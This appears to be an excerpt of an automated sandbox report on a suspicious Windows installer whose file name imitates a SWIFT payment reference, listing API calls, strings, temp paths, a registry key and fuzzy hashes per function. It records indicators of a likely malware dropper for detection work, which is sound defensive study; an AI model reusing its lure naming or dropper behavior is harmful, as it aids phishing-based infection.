ScreenToClient.USER32(?,?), ref: 00404E5B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93

Strings

f, xrefs: 00404E6F

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 39da0b83e90955b658913b401ee9b713f1841a36fe6a8bad0240d4c742fa7cb5
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: E9018C72A0021DBADB00DBA4CD81FFEBBB8AF55710F10002BBA51B61C0C7B49A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Strings

Times New Roman, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Times New Roman
API String ID: 2584051700-927190056
Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(000629D9,00000064,000629DD), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction ID: 6e758109fa8cded6d2ea51641b68a6ee4e1df044416b280c1a6c4c5bd582b841
Opcode Fuzzy Hash: b8c438f2cb2d4d4e81e5e052a7d6c8fe5fe1304565937caf9c710faa28001cd8
Instruction Fuzzy Hash: B1014F7164020DABEF609F60DE4ABEA3B69FB00345F008039FA06B51D1DBB999559F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
wsprintfW.USER32 ref: 00404DBA
SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

%u.%u%s%s, xrefs: 00404D9B

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Software\nekton\plastrendes), ref: 00402695

Strings

Software\nekton\plastrendes, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nso1577.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nso1577.tmp$Software\nekton\plastrendes
API String ID: 1659193697-3569989899
Opcode ID: 7a05d24eb738911f387c4cc48268cee578f337ee67ae4b8f05bf6e5f5feafd27
Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
Opcode Fuzzy Hash: 7a05d24eb738911f387c4cc48268cee578f337ee67ae4b8f05bf6e5f5feafd27
Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004054DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040550C
CallWindowProcW.USER32(?,?,?,?), ref: 0040555D

Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Strings

, xrefs: 004054ED

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403B21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
GlobalFree.KERNEL32(?), ref: 00403B42

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E22 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003), ref: 00405E38

Strings

C:\Users\user\Desktop, xrefs: 00405E22

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
